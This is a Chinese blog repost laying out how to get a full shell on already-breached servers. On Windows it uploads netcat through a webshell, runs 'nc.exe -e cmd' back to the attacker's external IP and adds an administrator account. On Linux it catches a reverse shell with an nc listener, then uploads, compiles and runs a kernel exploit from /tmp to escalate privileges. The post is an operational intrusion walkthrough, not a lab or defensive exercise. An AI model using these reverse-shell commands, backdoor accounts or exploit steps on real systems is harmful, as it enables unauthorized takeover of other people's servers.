最新消息:

Windows下用NC反弹cmd与linux下反弹shell提权

别人经典渗透过程学习 admin 9486浏览 0评论

Windows下NC反弹CMD提权

Server-U等都不可以用的情况下.   一般都可思考用此方法

不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了….
1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)
web目录都是有写有读的权限,我们直接传NC进去
20130327114703923
2:然后本地执行nc -vv -lp 52进行反弹
20130327114703533
3:在shell命令下执行
F:\wwwroot\img\nc.exe  -e  cmd路径  IP(外网IP)  52(这里是本机端口)
20130327114704225
ps:上面的cmd路径可以是系统自带的cmd路径,也可以是自己上传的cmd路径。
4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.
20130327114704514
5:直接添加用户,然后远程去连接!
20130327114705344
看到添加成功,也设置为管理组了!接下来直接远程连接就OK!​

 

Linux下使用NC反弹本地简单的提权

 

很多时候拿到shell了,然后在菜道或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!

先看下linux内核
uanme -a
20130327115202941
2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统!
找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666
20130327115202657
然后再点你shell
20130327115202697
连接成功就出现下面的内容
20130327115203554
然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通过Webshell把EXP上传到/tmp目录下,为什么要传到这个目录呢?因为在Linux下一般tmp目录的权限是可写可执行!
然后我们进到/tmp目录
cd /tmp  进入到tmp目录了,看下我们之前上传的2.6.18-194
20130327115203797
我这里有权限rwx,可读可写可执行.如果没有权限执行命令 chmod -R 777 文件名
我这里的exp已编译过了,直接执行溢出就ok了  ./2.6.18-194 要是你的exp没有编译那么先执行 gcc /tmp/文件名.c -o /tmp/文件名
命令先把他编译好,在执行 ./2.6.18-194运行EXP就OK了!
​​
20130327115203665

转自:

1、http://www.2cto.com/Article/201303/198404.html

2、http://www.2cto.com/Article/201303/198407.html

转载请注明:jinglingshu的博客 » Windows下用NC反弹cmd与linux下反弹shell提权


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址